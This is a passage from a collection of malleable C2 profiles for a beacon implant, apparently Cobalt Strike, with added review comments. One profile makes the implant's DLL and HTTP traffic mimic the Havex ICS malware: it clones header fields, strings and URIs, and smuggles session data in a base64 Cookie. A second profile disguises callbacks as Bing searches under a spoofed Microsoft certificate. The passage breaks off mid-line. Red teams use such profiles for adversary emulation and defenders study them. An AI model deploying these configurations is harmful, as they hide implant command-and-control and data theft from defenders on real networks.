# Clone some header values (Sample from: https://malshare.com/sample.php?action=detail&hash=c6e161a948f4474849d5740b2f27964a)
# ./peclone c6e161a948f4474849d5740b2f27964a
#
# The PE header fields below were copied from that sample with peclone. They are
# reproduced verbatim (checksum, timestamp, entry point, image sizes, export name,
# Rich header) so the loaded DLL's static metadata matches the original Havex DLL;
# do not "tidy" any of these values.
stage {
    set checksum "0";
    set compile_time "30 Dec 2013 07:53:48";
    set entry_point "134733";
    set image_size_x86 "348160";
    set image_size_x64 "348160";
    set name "Tmprovider.dll";
    set rich_header "\x63\x02\x25\x0f\x27\x63\x4b\x5c\x27\x63\x4b\x5c\x27\x63\x4b\x5c\x9a\x2c\xdd\x5c\x24\x63\x4b\x5c\x2e\x1b\xde\x5c\x3b\x63\x4b\x5c\x2e\x1b\xcf\x5c\x1b\x63\x4b\x5c\x2e\x1b\xc8\x5c\x8f\x63\x4b\x5c\x00\xa5\x30\x5c\x28\x63\x4b\x5c\x27\x63\x4a\x5c\x97\x63\x4b\x5c\x2e\x1b\xc1\x5c\x60\x63\x4b\x5c\x2e\x1b\xd9\x5c\x26\x63\x4b\x5c\x39\x31\xdf\x5c\x26\x63\x4b\x5c\x2e\x1b\xda\x5c\x26\x63\x4b\x5c\x52\x69\x63\x68\x27\x63\x4b\x5c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

    # disable this little obfuscation
    set stomppe "false";

    # make these things havex-ish: rename the reflective-loader export and blank
    # out the default DLL name strings in both the x86 and x64 stages
    transform-x86 {
        strrep "ReflectiveLoader" "RunDllEntry";
        strrep "beacon.dll" "";
    }

    transform-x64 {
        strrep "ReflectiveLoader" "RunDllEntry";
        strrep "beacon.x64.dll" "";
    }

    # strings gathered from Yara rules and sandbox string dumps
    #
    # These are the literal strings observed in the Havex sample. The misspellings
    # ("finging", "Programm", "was't", "Unexpective", "EXEPTION", "%O2i") are part
    # of the original binary and are exactly what public Yara rules key on, so
    # they must stay byte-for-byte as written here.
    stringw "%s <%s> (Type=%i, Access=%i, ID='%s')";
    stringw "%02i was terminated by ThreadManager(2)\n";
    stringw "main sort initialise ...\n";
    stringw "qsort [0x%x, 0x%x] done %d this %d\n";
    stringw "{0x%08x, 0x%08x}";
    stringw "Programm was started at %02i:%02i:%02i\n";
    stringw "a+";
    stringw "%02i:%02i:%02i.%04i:";
    stringw "**************************************************************************\n";
    stringw "Start finging of LAN hosts...\n";
    stringw "Finding was fault. Unexpective error\n";
    stringw "Hosts was't found.\n";
    stringw "\t\t\t\t\t%O2i) [%s]\n";
    stringw "Start finging of OPC Servers...";
    stringw "Was found %i OPC Servers.";
    stringw "\t\t%i) [%s\\%s]\n\t\t\tCLSID: %s\n";
    stringw "\t\t\tUserType: %s\n\t\t\tVerIndProgID: %s\n";
    stringw "OPC Servers not found. Programm finished";
    stringw "Start finging of OPC Tags...";
    stringw "[-]Threads number > Hosts number";
    stringw "[-]Can not get local ip";
    stringw "[!]Start";
    stringw "[+]Get WSADATA";
    stringw "[+]Local:";
    stringw "[-]Connection error";
    stringw "Was found %i hosts in LAN:";
    stringw "%s[%s]!!!EXEPTION %i!!!";
    stringw "final combined CRC = 0x%08x";
}

# GET channel: three space-separated candidate URIs. NOTE(review): presumably one
# is picked per request, as the URI-pool comment in putter.profile describes - confirm.
http-get {
    set uri "/include/template/isx.php /wp06/wp-includes/po.php /wp08/wp-includes/dtcla.php";

    client {
        # fixed request headers, identical on every GET
        header "Referer" "http://www.google.com";
        header "Accept" "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
        header "Accept-Language" "en-us,en;q=0.5";

        # base64 encoded Cookie is not a havex indicator, but a place to stuff our data
        metadata {
            base64;
            header "Cookie";
        }
    }

    server {
        # response headers imitate an Apache/PHP host; all are fixed literals, so
        # every response from this profile carries the same Server / X-Powered-By pair
        header "Server" "Apache/2.2.26 (Unix)";
        header "X-Powered-By" "PHP/5.3.28";
        header "Cache-Control" "no-cache";
        header "Content-Type" "text/html";
        header "Keep-Alive" "timeout=3, max=100";

        # response body: base64 of the payload behind a constant text prefix.
        # NOTE(review): transforms are presumably applied in listed order - confirm.
        # The prepended sentence is the same in every response body.
        output {
            base64;
            prepend "Sorry, no data corresponding your request.";
            print;
        }
    }
}

# define indicators for an HTTP POST
http-post {
    # three space-separated candidate URIs, as in the GET block
    set uri "/modules/mod_search.php /blog/wp-includes/pomo/src.php /includes/phpmailer/class.pop3.php";

    client {
        header "Content-Type" "application/octet-stream";

        # transmit our sess id as /whatever.php?id=[identifier]
        id {
            parameter "id";
        }

        # post our output with no real changes
        output {
            print;
        }
    }

    # The server's response to our HTTP POST
    server {
        # same fixed Apache/PHP header set as the GET response
        header "Server" "Apache/2.2.26 (Unix)";
        header "X-Powered-By" "PHP/5.3.28";
        header "Cache-Control" "no-cache";
        header "Content-Type" "text/html";
        header "Keep-Alive" "timeout=3, max=100";

        # this will just print an empty string, meh...
        # (transform chain as written: prepend "blah blah blah", mask, base64,
        # then the same constant prefix used in the GET response)
        output {
            prepend "blah blah blah";
            mask;
            base64;
            prepend "Sorry, no data corresponding your request.";
            print;
        }
    }
}
--------------------------------------------------------------------------------
/normal/bingsearch_getonly.profile:
--------------------------------------------------------------------------------
#
# Bing Web Search
#
# Author: @bluscreenofjeff
#

# HTTPS certificate subject fields imitating www.bing.com.
# NOTE(review): validity is presumably in days - confirm against the profile reference.
https-certificate {
    set CN "www.bing.com";
    set O "Microsoft Corporation";
    set C "US";
    set L "Redmond";
    set OU "Microsoft IT";
    set ST "WA";
    set validity "365";
}

# callback interval and jitter percentage; NOTE(review): units assumed from the
# other profiles in this set - confirm
set sleeptime "60000";
set jitter "20";
# fixed User-Agent literal, sent unchanged on every request
set useragent "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";
# DNS-channel settings; their exact semantics are not shown in this file - see the
# malleable C2 reference
set dns_idle "8.8.4.4";
set maxdns "235";

http-get {

    set uri "/search/";

    client {

        header "Host" "www.bing.com";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        # fixed Cookie literal: identical in every request from this profile, so
        # it is a static network indicator rather than a per-session value
        header "Cookie" "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG";

        # session metadata travels in the "q" query parameter, base64url-encoded
        metadata {
            base64url;
            parameter "q";
        }

        # constant query parameters to look like a Bing search request
        parameter "go" "Search";
        parameter "qs" "bs";
        parameter "form" "QBRE";


    }

    server {

        header "Cache-Control" "private, max-age=0";
        header "Content-Type" "text/html; charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "Server" "Microsoft-IIS/8.5";
        header "Connection" "close";


        output {
            netbios;
            prepend "Bing